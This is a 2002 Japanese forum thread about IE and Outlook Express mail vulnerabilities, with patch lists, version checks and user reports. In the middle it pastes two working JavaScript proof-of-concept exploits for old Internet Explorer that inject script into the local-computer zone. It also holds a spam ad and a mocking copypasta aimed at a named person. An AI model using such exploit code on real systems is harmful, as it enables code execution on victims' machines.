OE(又はIEコンポーネント使用メーラー)の問題点とその対策方法
1 :
スレ立て代理人 :
02/05/14 17:10
2 :
名無しさん@お腹いっぱい。 :02/05/14 17:11
<<メールに関連するIEの脆弱性と、対策方法について>>
HTMLメールを表示するために、IEコンポーネントを使用するメーラー
(有名どころではOutlook Expressなど)は、メールを開封、もしくは
プレビュー表示させただけで添付ファイルが実行されてしまうという
脆弱性が存在します。
(この脆弱性を利用して、感染被害を拡大させるウイルスが多数存在し、
現在でも世界中に蔓延しています。)
詳細は以下のMicrosoftのリンクを参照してください。
「不適切な MIME ヘッダーが原因で Internet Explorer が電子メール
の添付ファイルを実行する 《MS01-020》」
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS01-020 【対策が必要なソフト】
プレビューしただけで感染する恐れがあるソフト:
Windows95/98/98SE/ME/NT4/2000で、OutlookExpressを使用している方、
OutlookExpress以外でも、HTMLメール表示にIEコンポーネントを使用する
メーラーを使用している方で
・IE4を使っている人
・IE5.01、IE5.5で、SP2(サービスパック2)を当てていない場合
・IE6を、98,98SE,ME,NT4で最小インストールしたPC
バージョンは、ヘルプ→バージョン情報で確認できます。わからない人は下記を
参照してください。
・IEのバージョン確認方法
http://www2.ocn.ne.jp/~circle/IE_version.htm
3 :
名無しさん@お腹いっぱい。 :02/05/14 17:12
【現時点で対策方法】 前述の《MS01-020》を含め、現時点までに明らかになっている脆弱性への 対策方法は以下の通りです。 ・IE6.0(最小インストール以外)を使用している方 → 《MS02-009》+《MS02-015》を適用してください。 (OSがXP、又は2000の方は最小インストールでも上記パッチのみでOK) ・IE6.0(最小インストール)を使用している方 → フルインストール、又は標準インストール後、《MS02-009》+《MS02-015》を適用してください。 ・IE5.5(サービスパックなし、またはSP1)を使用している方 → 《IE5.5 SP2》+《MS02-009》+《MS02-015》の適用 ・IE5.01を使用している方(OSが2000、NT) → 《IE5.01 SP2》+《MS02-009》+《MS02-015》の適用 ・IE5.01を使用している方(OSがWin98、Me) → 《IE5.01 SP2》+《MS02-009》の適用 ※Win98、Me向けのIE5.01に関するサポートは終了したため、《MS02-015》 パッチはありません。今後のセキュリティ対策のために、IE5.5、もしくは IE6への移行を推奨します。
4 :
名無しさん@お腹いっぱい。 :02/05/14 17:12
だから、OEは使うなって言ってるだろうが!
6 :
名無しさん@お腹いっぱい。 :02/05/14 17:25
7 :
名無しさん@お腹いっぱい。 :02/05/14 17:26
>>5 それだと、OEじゃなきゃ問題ないみたいように読めます。
私はBecky!ユーザーですが、Becky!もちゃんと対策しないと駄目
なんですよ。リムアーツのサイトのトップにも書いてあります。
Becky!の設定:
「全般的な設定」「HTMLの表示」の項で、「MSIEコンポーネントを使用」
のチェックをはずしていれば、HTMLのメールが添付として扱われますので、
それをダブルクリックしない限り感染することはありません。
それがダブルクリックする人もいるんですよね…「W32.Klez.E removal tools」
なんて件名で来たりすると。
>>4 【 訂正 】
【対策後の確認】
・《MS02-015》を適用した場合は、IEバージョン画面の「更新バージョン」の行に
「q319182」が表示されていればOK.
※《MS02-009》の適用分は表示されません
・インターネットエクスプローラのバージョン確認は、バージョン確認の「バージョン」で確認。
IE5、5.5のSP2適用、又はIE6のフル/標準インストールを行った場合は
5.00.3314.2101 Internet Explorer 5.01 SP2 (Windows 95/98 and Windows NT 4.0)
5.00.3315.1000 Internet Explorer 5.01 SP2 (Windows 2000)
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2
6.00.2600.0000 Internet Explorer 6
のいずれかならばOK。
11 :
名無しさん@お腹いっぱい。 :02/05/14 17:42
OutlookExpressでメールを自動的にプレビューさせない方法 1.メニューバーの[表示]を押します。 2.[レイアウト]を押します。 3.「プレビューウインドウ」のプレビューウインドウを表示するの チェックボックスを外します。 4.[適用]ボタンを押してOKを押します。 これでメールはプレビューされません。 しかしウイルスから感染しなくなったのではないのでご注意ください。
12 :
名無しさん@お腹いっぱい。 :02/05/14 17:45
>>ALL オツ。 これでOEへの誤解も大方解けるというものじゃ。 また、初心者への啓蒙にも多いに作用することであろう。万歳!!
>>5 のように根拠を示さないのは荒らしですので放置おながいします。
17 :
名無しさん@お腹いっぱい。 :02/05/14 19:29
O.Eを使っててもパッチ当てて、AVソフトを入れとけばメール受信時 検出してくれるのでウィルスの侵入は防げる。 (最新パターンファイルを入れるのが遅かったらアウトだが) そんなに心配しなくてもいいのでは?
>>17 うん、そうなんだけど。
アンチウイルスソフトの定義ファイルが出る前の新種villiだったら嫌だから、MS01-020のダイレクトアクションを防ぎたいだけ、かと。
>>17 チミ専用に調合された特製トロイだったらどうしる?
>>19 何を言いたいのかさっぱり不明なわけだが。
今日、Klez にやられた知人のPC復旧を手伝ったんだけど、 それでも頑なにOEを使い続けようとするんで、 その理由を聞いてみたところ、 とにかく、最大シェアを根拠に、MS純正=ブランドであって、 それ以外の 3rd Party のメーラーを使うのはダサいってことらしい。 もしかして、こんな意識を持ってる初心者も多いのかもと、 ちょっと、盲点というか、意表を衝かれた感じだった。
WordはMSのだからいいワープロのはずだ、と信じている初心者と 似たようなもんじゃないかな。頑ななのにはこのテが多いな。 まあ、なんか入っているから、無料だからって感じで使っているケースの方が 多いかとは思うけど。こっちは他のを紹介されると動く可能性も。
「特別企画 Microsoftのメールとつきあう2番目に冴えたやり方」
http://www.watch.impress.co.jp/pc/docs/article/980401/41/mail/mail.htm 上のURLはちょうど4年前の「PCうおっち」のコラムです。
「PCうおっち」自体は年に一度の冗談企画なのですが、このコラムの中身は
全然冗談ではなく、当時のMSご謹製メーラーの実情と、問題点をよく書いていたと思います。
多分、このコラムが書かれた辺りですでにインターネットを使っていた
(もはや古株と言われてしまうかもしれない。もちろん私も(w )皆さんの
「MSと、MSご謹製メーラーに対する不信感」は、あの頃までに確立してしまっ
てなかなかぬぐい去れないんだろうなあ、と思っています。
だから今のOE批判者の意見には、一部同意してしまうところもあったり。
そういえば当時会社で使えと強制された、MSご謹製の「Internet Mail & News」
は本当にひでぇ代物で、それを元に作られたOutlookExpressは、それに比べる
と全然まともなメーラーだなあと感じてます。(あとは初期設定の件とMessage-ID
の件をなんとかしてもらえれば)
以上、年寄りの長文デスタ。
>>20 俺、敵が多いからMSのパッチの公開までのタイムラグが重要。
普段からセキュリティ情報チェックしないと安心できない。
>>1 ながながとテンプレしてOEを啓蒙しているようだが
何もしらない初心者にはパッチ当てろっていっても
それすらなんのことだかわからんだろうよ。
>>25 パッチも知らないような初心者がここに来ることはないだろうよ。
>>25 ここはNetwork Security板なんですが。
パッチも何も知らないような初心者が迷い込むようなところではありません。
29 :
名無しさん@お腹いっぱい。 :02/05/16 09:06
誰かに「パッチ当てろゴルァ」っていうときに、まとまったテンプレがあると楽という 程度でよろしいんじゃないですか。意外とまとまった情報はないし。
詳細 ==== この修正プログラムをインストールすることにより、悪意のあるユーザー による以下の攻撃を防ぐことができます。 (高) クロスサイトスクリプティング (CSS) により、スクリプトを ローカルコンピュータゾーンで実行される可能性がある問題です。 (高) ローカルコンピュータ上のファイルを読み取ることができる問題です。 しかし、この問題はファイルの場所を事前に知られていない限り悪用されるこ とはありません。また、ファイルの削除、変更などが行われることも ありません。 (高) 本来読み取ることができない、クッキー情報が読み取られる問題です。 (中) ファイルをダウンロード際の処理に問題があったために、スクリプトや 意図しないファイル実行される可能性がある問題です。 (低) Internet Explorer のゾーン判定を回避して、スクリプトが イントラネットゾーンまたは、信頼されたゾーンで実行される 可能性がある 2 つの問題があります。 対策が行われていないシステムがインターネットなどのネットワークを通じて 他のコンピュータと接続している場合、この問題を利用した悪影響を受ける ことがあります。 この攻撃は、ハッカーまたはクラッカーと呼ばれる 悪意のあるユーザーや、ワームといった自動的な攻撃を目的とした 悪意のあるプログラムから行われることがあります。 ・ディスク上の任意のファイルが読み取られます。しかし、削除、変更が 行われることはありません。 ・意図しないスクリプトが実行されます。 ・アプリケーションが実行されます。 (通常悪意のあるアプリケーション であり、ハードディスクのフォーマットなどが実行されてしまいます) 日本語による詳細については、ただいま準備中です。
【対策後の確認】 ・修正パッチを適用した場合は、バージョン画面の「更新バージョン」の行に 《MS02-023》を適用した場合は「q321232」が表示されていればOK
33 :
名無しさん@お腹いっぱい。 :02/05/16 12:04
34 :
名無しさん@お腹いっぱい。 :02/05/16 14:36
人柱さまのレポートきぼんぬ
>28 残念ながら想像できないことが起きています。 こうして2ちゃんの良い板がまたひとつ死んでいく。
>>35 もしかしてセキュ板にDQNが誘導されてきている?
40 :
名無しさん@お腹いっぱい。 :02/05/16 15:18
q321232は「Win2000 SP2+SR1」で問題無しでした。
同じくWin2000 SP2+SR1で今のところ大丈夫
Win ME + IE6にq321232当てたら再起動選択時にブルースクリーンに。 その後確認したら、パッチは無事当たっていた模様。
Win2K IE5.5 SP1 +《MS02-009》+《MS02-015》な環境です。 《MS02-023》、無事適用できました。
var site = window.parent.dialogArguments.url; function printSite() { document.write( site); } <script> var sCode = '<'+'script>alert("This is running from: " + location.href);top.close()</'+'script>'; window.showModalDialog("redirect.asp", {url:sCode}) </script> <%@Language=Jscript%><% Response.Redirect("res://shdoclc.dll/policyerror.htm"); %>
<script language="jscript"> // HTML to be injected (will run in the "My Computer" zone) var sHTML="<b>We're in!</b>"; // Object to return from tags("link"), must be a function because they use // objects(i) instead of objects[i], VB style collection access. function oExploit(iSec) { ����return { ��������// Satisfy line 201 ��������rel:"stylesheet", ��������// Satisfy line 204 ��������readyState:"exploit", ��������// Exploit line 205 ��������href:sHTML ����}; } // A length property so it will enter the loop oExploit.length=1; // A fake window object, so no errors will be raised during the process, // the custom "tags" method will return an empty array for any element // other than our target (<link>), in which case it will return the oExploit // object above. var oSecurity={ ����document:{ ��������all:{ ������������tags:function (sTag) { ����������������return sTag=="link" ? oExploit : []; ������������} ��������} ����} } // Run exploit, getFile.asp redirects to res://shdoclc.dll/analyze.dlg // and oSecurity (fake window) is sent as the dialog argument. showModelessDialog("getFile.asp",oSecurity); </script>
Win98SE IE5.5SP2です。無事当たりました。
>>40-41 「Win2000 SP2+SR1」で問題無
>>42 Win ME + IE6にq321232あてるとブルースクリーン。パッチはあたる
>>43 Win2K IE5.5 SP1 +《MS02-009》+《MS02-015》問題なし
>>47 Win/ME IE6.0パッチあてた後に電源オフ。その後電源オンでスキャンディスクが走った。急いでたので電源オフが半端だったかも。
Win2000 SP2+SR1(IE6)で問題なしでした。追記します。
winMeでIE6すが、q321232問題なしでしたよ
私もWinMe IE6でq321232出来ました。ところでVB2002常駐のままで 実行してよかったのかなァ 初心者的疑問かも。
Win98 IE5.5SP2でし。q321232問題なし
夜逃げしたい?
金欠?
ブラック?
別れさせたい?/騙された?/不良債権・名義貸し?
トラブル各種は相談してくれ。
(有)エスアールエー/0120-0120-49
[email protected]
53 :
Internet Explorer最新バージョンまとめ :02/05/18 08:37
54 :
訂正:IE最新バージョン :02/05/18 08:40
56 :
名無しさん@お腹いっぱい。 :02/05/18 11:50
MS02-09のq318089はバージョンに表示されなんですよね。 当てたかどうか忘れちゃったんだけど、確認する方法ないですか? もう一回当てても不具合ないでしょうか?
>>57 そこを見てもよくわからないんですが・・・・
61 :
名無しさん@お腹いっぱい。 :02/05/20 08:28
age
62 :
名無しさん@お腹いっぱい。 :02/05/20 09:36
EdMAX使ってるんだけど、とりあえず大丈夫?
63 :
名無しさん@お腹いっぱい。 :02/05/20 09:44
270 名前:参加するカモさん :02/05/20 07:43 西村って話し方変わったね なんだか淡々としてクールでかっこよくなったね でも本当の西村とはちょっと違うような気がするなあ 今は誰に憧れて誰の真似をしてるのかなあ 中学の頃は東京ラブストーリーの「完治」に憧れてたよねえ 放送日の翌日はガンガンに完治に成りきっちゃって、あのもどかしい喋り方を連発してたよねえ 今だから言うけど、そんな西村のことみんな「気持ち悪い」って言ってたよ それから西村って中学に入って急に背が伸びたよね でもどうして学生服は取り換えなかったの? ズボンはくるぶしが丸見えだったし、学生服は腰までしかなかったじゃん あんな恰好で完治に成りきられても、ちょっとねぇ、、って感じだったよ 今だから言うけど、そんな西村のことみんな「気持ち悪い」って言ってたよ ついでに言っちゃうけど、西村って給食を飲み込む瞬間、どうしてあんなに目を見開くの? 癖なのかも知れないけど、なんか牛みたいでおかしかったよ 女子の間では給食の時間に「ひろゆきを見てはいけない」という黄金律があったんだよ 今だから言うけど、そんな西村のことみんな「気持ち悪い」って言ってたよ
64 :
IE5.01,IE5.5はパッチ適用後も問題あり? :02/05/22 12:36
65 :
名無しさん@お腹いっぱい。 :02/05/22 13:27
66 :
名無しさん@お腹いっぱい。 :02/05/28 12:31
>>65 ありがとうございます。設定をちゃんとやっておけばいいんですね。
デフォルトのままなので、とりあえず大丈夫・・かな?
70 :
名無しさん@お腹いっぱい。 :02/05/31 08:34
71 :
名無しさん@お腹いっぱい。 :02/05/31 22:33
何だかんだいってOEはデザインだけなら一番好き。 OEのセキュリティホールを狙ったウイルス被害はデザインをマトモにしない3rdメーラーの作者のせいにしてやる
73 :
名無しさん@お腹いっぱい。 :02/06/07 22:37
IE 5.5/6に深刻なホール,対策はGopherプロトコルを無効にすること
フィンランドのセキュリティ・ベンダー「Oy Online Solutions」は現地時間6月
4 日,Internet Explorer(IE)5.5/6 のセキュリティ・ホールを公表した。Web
ページや HTMLメール中のリンクをクリックすると,ユーザーのパソコン上で任意
のコード(プロ グラム)を実行させられる恐れがある。対策は,IEの設定を変更
してGopherプロトコ ルを無効にすること。パッチは公開されていない。
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020607/1/
74 :
名無しさん@お腹いっぱい。 :02/06/07 23:40
78 :
MS02-030 :02/06/28 09:01
>>78 Windows Updateで更新可能ですた。
80 :
名無しさん@お腹いっぱい。 :02/06/28 17:25
ひろみちゅがBecky!のセキュリティホール晒しちゃってるけど、 「OE使うやつ糞、Becky!使え」つってたヤシはどういうんだろう。 (w OEよかはるかにヘボな穴だよなぁ。他の(国産)メーラも同様の穴があるぽ。
一般論だけど、ちょっとした見落としとかあとから見ると 「ヘボな穴」てのは案外あるみたい。 IEやOEの場合、ユーザーが多いからねらわれるもので、 ちょっとした穴でも表沙汰になるてのはありそうだけどね。
Outlook2002でhtmlメルを全てテキストにしちゃえば、割とセキュアな予感。 そうは言っても、いつも南の島とか子犬の画像を貼り付けたhtmlを送る漏れは、困った人なんだろうか。
WebBUG貼り付けて開封確認してる俺よりは健全かと…
一般的にOE特有のセキュリティホールをついたものはOE以外は関係なかったりするけど、 IEに対するセキュリティホールをついたものはOEでなくても IEコンポーネントをHTMLメール表示の手段に用いているメーラは感染する危険がある。 …ということはNetscape MessengerかShurikenを使えってこと!?
85 :
名無しさん@お腹いっぱい。 :02/06/29 10:53
>>84 今回のはIEコンポーネントを使ってるせいじゃなく一時ファイルのハンドリングの問題、
OEではとっくに対処済みにもかかわらず、指摘されるまで放置されていた。
前に書いた事あるような気がするけど、OE以外の(特に国産の)メーラは検証されてないから
セキュリティホールが見っかって無いだけだって事が実証されたね。
! ! ! O E 使 え ! ! ! (w
デフォでhtml読むのとプレビュonなのが 初心者には最凶の欠陥だと思うのだが・・・
88 :
名無しさん@お腹いっぱい。 :02/06/29 11:20
漏れも、常用ブラウザはOperaなのに、気に入ったメーラーが見つからなくて 結局OE6.0使ってる。もちろんたまにしか使わないIEのパッチはせっせと 当てているが。 OEもデフォルト設定見直すだけで随分とマシになると思う。
( ゚Д゚)ハァ?
>>86 何もわかってない人以外は、「HTMLメールを表示」なんて
とっくにオフにしてしまってると思いますが。
その辺はどうなんだろうか?>Becky!使いの方々。
その「何も分かってない人」のせいでこれだけウィルスが広まってると思うんだが。 ウチの職場なんてhtml、プレビュOffの奴ほとんどおらんかったぞ。 どこの職場でも似たような惨状だろう。だからパソコン買って始めて使う メーラがOEって現状がやばすぎるんでないかと。
>>91 >>92 あの、すんません。
俺、「HTMLメールを表示」なんて項目をオフにした覚えが無くて慌ててオプション探したんですが見つからず、
調べてみても
デフォの送信をテキスト形式にする
プレビューoff
次の時間プレビューするとメッセージを開封済みにする
プレビューウィンドウで表示するメッセージを自動的にダウンロードする
のチェックをはずすくらいしか解説してなかったり…
どこっすか? 今までに一通もHTMLメール来た事無いけど、設定しとかないと不安です…
>>93 >「HTMLメールを表示」なんて項目
91、92じゃ無いけど横から失礼。そいいう項目は「無い」。
あくまで「送信時の形式をhtmlかtextか」選択するだけ。html形式で送信
されるメールによって伝播するウィルスが有るのは確かだから、自分が
加害者になるのを防げるだけ。
で、以下は極論(識者の反論歓迎)
htmlメール見るなっていうのは「交通事故おこしたく無いなら車運転するな」
っていうのと同じでナンセンス、というのが俺の考え。html形式のメールは
text形式のメールでは表現できない良さが有るし、それ自体が悪ではない。
http://japan.internet.com/wmnews/20020624/1.html こういう話も有る。
不安になるくらいだからAVソフトの導入くらいはやってるんだろう?
そうなら、恐れるな。
・添付ファイルを安易に実行しない。
・プレビューをオフ(これもフィルタールールを設定してうまく振り分ければ
を俺は必要無いと思うが)
で充分だよ。
>>95 ああ、確かにOEと勘違いしてました。スマン。
鬱田シノウ
97 :
名無しさん@お腹いっぱい。 :02/07/12 22:47
IE6なんですけど、最近ネットしてるとHDDがカリカリいって、少しフリーズして 「このエラーを鯖に送信しますか」とメッセージが出てIEが終了します 何度も同じエラーが起こるので、修復しましたが、又同じエラーがでます アップデートも、ちゃんとしてるのに原因はなんでしょうか?
99 :
名無しさん@お腹いっぱい。 :02/07/12 23:05
>>98 たまじゃなくて、毎日出ますよ〜 修正パッチとか無いのかな?
うんな糞、使わなければ解決だ(w
101 :
名無しさん@お腹いっぱい。 :02/07/13 00:35
103 :
Frethem蔓延中 :02/07/15 17:29
バージョン確認方法リンク切れスマソ。 IE:ヘルプ→バージョン情報
105 :
名無しさん@お腹いっぱい。 :02/07/17 12:51
それにしても、いいかげんプレビューで感染は言わなくてもいいのに決まり文句になってるね。 もう6か5.5SP2(か5.01SP2)にしてないでプレビューで感染したら自業自得だと思う。 (あえて前の使ってる人は最低でもプレビューなんかしてないはず) 新しい穴の予知でもしてるのかな
>>105 いまだに知らない人がいるのだからプレビュー感染告知して当然だろ。
自分が知っているからといって、自業自得は言い過ぎ。
107 :
名無しさん@お腹いっぱい。 :02/07/17 16:13
>>3-4 《MS02-009》を適用したが「q318089」が表示されないぞ。
winMe
ie6標準インストール
108 :
名無しさん@お腹いっぱい。 :02/07/17 18:23
このスレの8を見てみそ
109 :
名無しさん@お腹いっぱい。 :02/07/18 11:19
あの〜 初心者的な質問かも知れませんけど、、 OEのメールログファイル(.dbxファイル)の中身をワードパッドで見ると、 ほとんどの中身は暗号化されてて解らないんですけど、 はじめと終わりの方だけ暗号化されてなくて、 しかも,内容が2chのログとかなんです。 2chみるのはかちゅーしゃ使ってますけど、OEのログファイルに かちゅのログが残るって変ですよね?? virusは検出されてないんですけど、何が問題なんでしょうか?
>>109 気にすることはないと思う。
確かめてみたが一部にInternet Explorerの履歴が残っているみたいだ。
かちゅはIEのコンポーネント使ってたっけ?
111 :
名無しさん@お腹いっぱい。 :02/07/18 11:54
>>106 > 自分が知っているからといって、自業自得は言い過ぎ
そうか?
105ではないけど、半ば自業自得だと思う。
プレビューしただけで感染する危険性があるっていう情報は、
2ちゃんでなくても、ネット上でいやと言うほど溢れてるわけだし。
("プレビュー感染"は事あるごとに告知するべきだとは思う)
そもそもウィルスに感染する大半は、
セキュリティ関連情報を収集するようなこともせず、
当然 バージョンアップもパッチあてもしないで、
デフォで使っている初心者or初級レベルのユーザーだろ。
("大半"は言い過ぎかもしれんが、過半数以上はそうだと思う)
初心者だからこそ情報収集を積極的にしなきゃいかんし、
どんな理由であれ、それをしないのはユーザーの怠慢だと思う。
MS02-027Gopher問題のIE用パッチなかなか出ないなぁ。 IE6SP1はいつ出るのやら・・・
MS02-027Gopher問題のIE用パッチなかなか出ないなぁ。 IE6SP1はいつ出るのやら・・・
117 :
IE最新バージョン :02/08/23 11:48
119 :
名無しさん@お腹いっぱい。 :02/08/28 12:03
保全あげ
120 :
名無しさん@お腹いっぱい。 :02/08/29 18:12
Netscapeブラウザ利用者、さらに減少
米Web解析サービス会社WebSideStoryのStatMarket部門は8月28日、Netscapeのブラウザを使うWebサーファーの割合が、全世界で3.4%にまで減少したと報告した。同ブラウザのシェアは1年前は13%、今年3月の時点では7%と報告されていた。
一方、MicrosoftのInternet Explorer(IE)を使うWebサーファーの割合は引き続き増加しており、前年の87%から96%に拡大したという。
同社の報告では、2002年8月26日現在、MicrosoftとNetscape以外のブラウザを使っている人の割合は全世界で0.64%。
なおオランダのWeb調査会社OneStat.comも6月に、Netscapeブラウザ全体のシェアは3.4%と報告している。(ZDNet)
http://headlines.yahoo.co.jp/hl?a=20020829-00000024-zdn-sci 0.64%の人は手あげて
121 :
名無しさん@お腹いっぱい。 :02/08/29 18:16
>>118 の通りにし、
5.5SP2用にQ323759をインストールしました。
バージョン確認の「バージョン」でも、Q323759がありました。
しかしUAは
HTTP_USER_AGENT . Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; T312461)
と出ます。これで問題ないんですよね?
誰もUAに出るとは言ってないんだが。
>>120 Opera6.05使ってんだけど、Cookieの自動再読み込みしない仕様らしく
強制cookie制導入後はすんなり書きこめないことが多いんだな。結局2ちゃん
書き込み用にIE使うハメに…
124 :
名無しさん@お腹いっぱい。 :02/09/08 01:51
ウィルス対策で「プレビューウィンドウの表示をOFFにしろ」というのさんざん言われて いるが使いにくいので普段OFFにしていない人も多いだろう。 プレビューウィンドウの表示/非表示切り替えるのにいちいち「表示」-「レイアウト」 と選択していくのは面倒なのでワンクリックでプレビューウィンドウの表示/非表示を切 り替える方法はないのか(たぶんないんだろうなあ)と思ってこの前OEの設定をいじって たらあるんだね。ツールバーにプレビューボタンを追加すればいいだけだよ。 今までこんなことも知らなかったとは・・・。 これでOEもかなり使いやすくなったよ。といいつつメーラーとしてはメインで使ってない けど。 方法はツールバー上で右クリックして「カスタマイズ」→「ツールバーの変更」でプレビ ューボタンを追加
あぼーん
テスト3
127 :
二つ目のお気に入りとして :02/09/08 08:25
>>123 「選択したサーバーのクッキーのみを受け入れる」で2chを選択したサーバーに加えても書き込めないことが多いようだ。<Opera
「自動的にすべてのクッキーを受け入れる」にすると書き込める。
そうすると他のサイトでクッキーを食らってしまうので「終了時に新たなクッキー
を破棄する」にチェックを入れる。
さらにFW製品(NISなど)で他のサイトのクッキーを制限するといい。
130 :
深刻度「高」 :02/09/10 21:07
>>130 Thanks!とりあえず Active Scripting無効にするよ。
132 :
名無しさん@お腹いっぱい。 :02/09/12 17:53
sp1でプレーンテキストでの表示が可能になったとか
133 :
名無しさん@お腹いっぱい。 :02/09/12 18:20
>132 ソースキボンヌ
134 :
名無しさん@お腹いっぱい。 :02/09/12 18:33
SP1英語版入れたよ。 確かにoption>read>reading messagesのところの上から四番目の項目に、 Read all messages in plain textってのが出来てるね。 まあOEは使ってないからね。 BECKYにも当然のことなが同じようなconvert to plain textっていう項目があるよ。
漏れも英語版入れた したらVMLだかのインストール失敗しますとさ 鬱だ
どうせなら江戸マックスみたいにツールバーから変えられればええのに
138 :
名無しさん@お腹いっぱい。 :02/09/13 00:40
プレーンテキストで読めるって事はプレビューでの危険性が 減るって事?
139 :
名無しさん@お腹いっぱい。 :02/09/13 08:05
>>138 そだね。M$のやることだから油断は禁物だが。
IE6SP1、まだ英語版、ドイツ語版、フランス語版しかリリースされてないね。
↑コンポーネント入ってなかった。
143 :
名無しさん@お腹いっぱい。 :02/09/19 07:27
144 :
名無しさん@お腹いっぱい。 :02/09/19 07:47
145 :
名無しさん@お腹いっぱい。 :02/09/19 09:11
>>143-144 サンクス 落としてみた。
IE Version:6.0.2800.1106 更新バージョンSP1
OE 6.00.28000.1106
になった。
146 :
名無しさん@お腹いっぱい。 :02/09/19 12:30
OEのセキュリティが向上したよ。 これまでできなかったHTMLメールのテキスト表示が可能になった。 IEではファイルのダウンロード時のダイアログに安全性に関する 警告文が出るようになった。 それからMicrosoft の説明によると。 「Internet Explorer 6 での懸案事項を解決したアップデート ファイルの集積です」 だそうですよ。
OEって一つのメールを開いた状態でそのメールを削除すると自動的に 次のメールが開くんだよな。そのメールを削除したいだけで次のメールを 開くかどうかについては何も指示してないのに勝手に開く。次のメールがウィルスメールだったりしたら危険だと思う。アンチウィルス入れてれば いいんだけど、やはり嫌だ。
148 :
名無しさん@お腹いっぱい。 :02/09/19 12:43
削除する時だけツールバーのボタンでプレビュー表示にしなければいいじゃない。
>>148 プレビュー切ってても、メールを開いたままで削除ボタンを押すと
次のメールに切る変わるんだよ。
7634KBから落ちないぞおおおおお
151 :
名無しさん@お腹いっぱい。 :02/09/19 14:09
152 :
名無しさん@お腹いっぱい。 :02/09/19 14:39
>>149 実際にメール開いたまま削除してみたら、
おっしゃることがよく分かりました。
開いたまま削除することなど今までやったことが無かったもので。
>>147-152 古いIEを使ってて、来たメールを読んで開いたまま削除すると次のメールが
MS01-020のセキュリティホール突くものだった場合にヤバイね。
その場合でもアンチウィルスソフトが常駐してれば大丈夫だけど。
>>151 さんくすこ
さっきIE入れたのにまたぱっち当てるの・・・
めんどくさーーーい!!けど無事終了。
メーラーはOEを使わないが吉ですな
>>151 Windwos Updateで可能。ただし前提条件があるので>151のサイトで
バージョン等確かめてからパッチ当てること。
156 :
名無しさん@お腹いっぱい。 :02/09/19 16:06
157 :
名無しさん@お腹いっぱい。 :02/09/20 01:57
SP1入れたけど これどこまでのパッチあたってるの?
158 :
名無しさん@お腹いっぱい。 :02/09/20 04:11
>>146 SP1入れてみたが
OEのテキスト→HTMLの切り替えはオプション画面でやるみたいやね。
ベッキや江戸みたいにメイン画面からワンクリックで切り替わる機能が無いぶん
初心者には安全性は高いが、
雛型メールとか乱発送信してる連中には、いろいろトラブルもありそうだ(W
補足。 いったんテキスト表示に設定したあと、 テキスト→HTML表示の切り替えって意味ね(^^;
160 :
名無しさん@お腹いっぱい。 :02/09/20 10:30
161 :
名無しさん@お腹いっぱい。 :02/09/20 13:56
SP1を入れないと、どうなるんですか? 昨日入れたんだけど、IEに繋がらなくなって削除したんだけど やっぱ入れたほうがいいんですか?
162 :
名無しさん@お腹いっぱい。 :02/09/20 15:30
>IEに繋がらなくなって
?
IE6に
>>118 の状態であればとりあえずはOKだけど(Gopher問題が残るが)。
そうでないとレアケースだがマシンが乗っ取られたりセキュリティ上の問題がある。
パッチ当てたりするときはFWやアンチウィルスなど常駐アプリを停止した上で
当てないと不具合でることあり。
163 :
名無しさん@お腹いっぱい。 :02/09/21 12:58
本日HDが壊れて再インストール中。
本ちゃん入れてSP1を入れてから、Updateかけるも該当なし。
>>157 Internet Explorer 用の累積的な修正プログラム (Q323759) (MS02-047)
まで含んでいるようだ。
ありがとさん。
それは、
「この問題に対する修正は Windows XP Service Pack 1 以降に含まれています。」
という記述がネタ元?
ということは、MS02-050、51はあてなあかんねんな。
MSは一覧表位作れっちゅうんねん。
ア、アー・・・アレクサ!!
165 :
名無しさん@お腹いっぱい。 :02/10/03 08:29
166 :
セキュリティ情報 :02/10/03 14:23
167 :
名無しさん@お腹いっぱい。 :02/10/05 00:11
age
168 :
IE最新バージョンまとめ :02/10/07 12:00
WindowsNT4.0SP6aに漏れがありました。またQ323759がIE5.5SP1にも用意されたのでIE5.5SP1にQ323759でもOK。 ・Windows95 5.50.4807.2300 Internet Explorer 5.5 Service Pack 2 でQ323759がついていること 5.50.4522.1800 Internet Explorer 5.5 Service Pack 1 でQ323759がついていること ・Windows98/ME 6.00.2800.1106 Internet Explorer 6 Service Pack 1 6.00.2600.0000 Internet Explorer 6(フルまたは標準インストールのこと)でQ323759がついていること 5.50.4807.2300 Internet Explorer 5.5 Service Pack 2 でQ323759がついていること 5.50.4522.1800 Internet Explorer 5.5 Service Pack 1 でQ323759がついていること ・WindowsNT4.0SP6a 6.00.2800.1106 Internet Explorer 6 Service Pack 1 6.00.2600.0000 Internet Explorer 6 でQ323759がついていること 5.50.4807.2300 Internet Explorer 5.5 Service Pack 2 でQ323759がついていること 5.50.4522.1800 Internet Explorer 5.5 Service Pack 1 でQ323759がついていること
171 :
名無しさん@お腹いっぱい。 :02/10/07 20:13
172 :
名無しさん@お腹いっぱい。 :02/10/07 21:54
なんでいまだにIEやOE使ってるの? パッチ貼るのが趣味ですか? 会社用でやむを得ずが大半だとは思うが・・それにしても・・
>>172 OEは使わないでおくことが可能だが、WindowsOS使ってて
IE使わないで済む人はまずいない。組み込みコンポーネント
なんだから。
174 :
名無しさん@お腹いっぱい。 :02/10/07 22:30
>>172 パッチはるのが唯一の楽しみでございます
むしろ会社でこそIE・OEは使わん。万が一があった場合に取引先に対する 信用問題になっちまう。
会社では、オークションとかロトとかやってるヤツは、 警告アナウンス無視で OE やってます。 この前 IE6SP1 アナウンスしてやったら、エラーになったと 文句メールがきたさぁ。。。
俺のブラウザツギハギだらけ
178 :
名無しさん@お腹いっぱい。 :02/10/08 00:25
>WindowsOS使っててIE使わないで済む人はまずいない。 組み込みコンポーネントなんだから。 そりゃ大変だねぇ(w
ネットに関して危機感が持てる。
180 :
名無しさん@お腹いっぱい。 :02/10/11 09:24
